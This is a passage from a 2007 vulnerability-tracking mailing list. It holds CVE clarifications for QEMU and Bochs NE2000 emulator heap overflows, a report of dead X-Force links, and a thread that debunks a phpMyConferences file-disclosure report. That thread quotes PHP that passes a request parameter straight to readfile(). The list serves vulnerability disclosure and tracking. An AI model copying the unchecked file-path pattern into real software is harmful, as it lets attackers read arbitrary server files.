.mov file to execute code remotely: http://www.piotrbania.com/all/adv/realplayer-heap-corruption-adv.txt http://www.piotrbania.com/all/adv/realplayer-memory-corruption-adv.txt Oddly, Real's advisory doesn't mention anything about .mov files per se. And neither of Piotr's advisories offers a solution, although they say Real responded to them a year ago. Anyone else notice this? Are the issues related or not? George -- theall at tenablesecurity.com From coley at mitre.org Tue Oct 30 21:37:20 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 30 Oct 2007 17:37:20 -0400 (EDT) Subject: [VIM] Clarification on old QEMU/NE2000/Xen issues Message-ID: <200710302137.l9ULbK0e029328@faron.mitre.org> Do NOT ask me how long it took to iron all this out, but I thought I'd explain what I know so far, 'cause it's still not all set in stone :-( In April/May, Tavis Ormandy released a paper on issues in emulator packages including Qemu, Bochs, and others. I had provided some CVE's to him, but there were a couple gaps, and patches started getting released before I could resolve everything on vendor-sec (I share much of the blame in this for not actively following up, alas). As a result of the internal confusion, we had: CVE-2007-1321 being used in DEBIAN:DSA-1284 to actually talk about 3 separate issues, where REDHAT:RHSA-2007:0323 only meant to cover one of them with that same CVE. CVE-2007-1323 was accidentally associated as part of the Qemu patches, but it was meant for Bochs (this error came from me making some poor formatting decisions in an email to vendor-sec) Further complicating this was Xen, which had some of these issues, I still don't know which. As of this moment, I've created a couple CVE's. CVE-2007-1321 - receive integer signedness CVE-2007-5729 (NEW) - "mtu" heap overflow CVE-2007-5730 (NEW) - "net socket" heap overflow CVE-2007-1323 - REJECTED because it was used for multiple issues/products; Bochs NE2000 RX Frame heap overflow is CVE-2007-2893 I've got an inquiry in to see which of these lower-level CVEs were addressed in Xen. Current CVE's are below. - Steve ====================================================== Name: CVE-2007-1321 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1321 Reference: MISC:http://taviso.decsystem.org/virtsec.pdf Reference: DEBIAN:DSA-1284 Reference: URL:http://www.debian.org/security/2007/dsa-1284 Reference: REDHAT:RHSA-2007:0323 Reference: URL:http://www.redhat.com/support/errata/RHSA-2007-0323.html Integer signedness error in the NE2000 emulator in QEMU 0.8.2 allows local users to trigger a heap-based buffer overflow via certain register values that bypass sanity checks, aka QEMU NE2000 "receive" integer signedness error. NOTE: this identifier was inadvertently used by some sources to cover multiple issues that were labeled "NE2000 network driver and the socket code," but separate identifiers have been created for the individual vulnerabilities since there are sometimes different fixes; see CVE-2007-5729 and CVE-2007-5730. ====================================================== Name: CVE-2007-1323 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1323 ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2007-2893. Reason: this candidate was intended for one issue, but some sources used this identifier for a separate issue, and a duplicate identifier had also been created by the time dual use was detected. Notes: All CVE users should consult CVE-2007-2893 to determine if it is appropriate. All references and descriptions in this candidate have been removed to prevent accidental usage. ====================================================== Name: CVE-2007-2893 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2893 Reference: MISC:http://taviso.decsystem.org/virtsec.pdf Reference: DEBIAN:DSA-1351 Reference: URL:http://www.debian.org/security/2007/dsa-1351 Reference: BID:24246 Reference: URL:http://www.securityfocus.com/bid/24246 Reference: FRSIRT:ADV-2007-1936 Reference: URL:http://www.frsirt.com/english/advisories/2007/1936 Reference: SECUNIA:25470 Reference: URL:http://secunia.com/advisories/25470 Reference: SECUNIA:26364 Reference: URL:http://secunia.com/advisories/26364 Reference: XF:bochs-ne2000-bo(34508) Reference: URL:http://xforce.iss.net/xforce/xfdb/34508 Heap-based buffer overflow in the bx_ne2k_c::rx_frame function in iodev/ne2k.cc in the emulated NE2000 device in Bochs 2.3 allows local users of the guest operating system to write to arbitrary memory locations and gain privileges on the host operating system via vectors that cause TXCNT register values to exceed the device memory size, aka "RX Frame heap overflow." ====================================================== Name: CVE-2007-5729 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5729 Reference: MISC:http://taviso.decsystem.org/virtsec.pdf Reference: DEBIAN:DSA-1284 Reference: URL:http://www.debian.org/security/2007/dsa-1284 The NE2000 emulator in QEMU 0.8.2 allows local users to execute arbitrary code by writing Ethernet frames with a size larger than the MTU to the EN0_TCNT register, which triggers a heap-based buffer overflow in the slirp library, aka NE2000 "mtu" heap overflow. NOTE: some sources have used CVE-2007-1321 to refer to this issue as part of "NE2000 network driver and the socket code," but this is the correct identifier for the mtu overflow vulnerability. ====================================================== Name: CVE-2007-5730 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5730 Reference: MISC:http://taviso.decsystem.org/virtsec.pdf Reference: DEBIAN:DSA-1284 Reference: URL:http://www.debian.org/security/2007/dsa-1284 Heap-based buffer overflow in QEMU 0.8.2 allows local users to execute arbitrary code via crafted data in the "net socket listen" option, aka QEMU "net socket" heap overflow. NOTE: some sources have used CVE-2007-1321 to refer to this issue as part of "NE2000 network driver and the socket code," but this is the correct identifier for the individual net socket listen vulnerability. From coley at mitre.org Tue Oct 30 22:53:04 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 30 Oct 2007 18:53:04 -0400 (EDT) Subject: [VIM] Old ISS X-Force links seem dead Message-ID: <200710302253.l9UMr4cZ000731@faron.mitre.org> Dead links include: http://xforce.iss.net/xforce/xfdb/27763 http://xforce.iss.net/xforce/xfdb/13419 http://xforce.iss.net/xforce/xfdb/31307 http://xforce.iss.net/xforce/xfdb/35492 and who knows how many thousands of others (at least 14000 in CVE). But http://xforce.iss.net/xforce/xfdb/38134 seems alive (that's from Oct 29). I'll send an inquiry. - Steve From theall at tenablesecurity.com Wed Oct 31 20:14:15 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 31 Oct 2007 16:14:15 -0400 Subject: [VIM] phpMyConferences <= 8.0.2 Remote File Disclosure Vulnerability Message-ID: <4728E217.2000702@tenablesecurity.com> I don't know how many sites are actually affected by this. Here's the affected script as it appears in version 8.0.2: Notice the unclosed bracket in the second line above? php can't parse it. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Wed Oct 31 20:48:45 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 31 Oct 2007 15:48:45 -0500 Subject: [VIM] phpMyConferences <= 8.0.2 Remote File Disclosure Vulnerability In-Reply-To: <4728E217.2000702@tenablesecurity.com> References: <4728E217.2000702@tenablesecurity.com> Message-ID: <4728EA2D.9070701@milw0rm.com> Removing this on my side. Good find man. /str0ke George A. Theall wrote: > I don't know how many sites are actually affected by this. Here's the > affected script as it appears in version 8.0.2: > > header("Content-disposition: attachment; filename=".$_GET('filname']); > header("Content-Type: application/force-download"); > header("Content-Transfer-Encoding: binary"); > header("Content-Length: ".filesize($_GET['dir'])); > header("Pragma: no-cache"); > header("Cache-Control: no-store, no-cache, must-revalidate, > post-check=0, pre-check=0"); > header("Expires: 0"); > readfile($_GET['dir']); > > ?> > > Notice the unclosed bracket in the second line above? php can't parse it. > > > George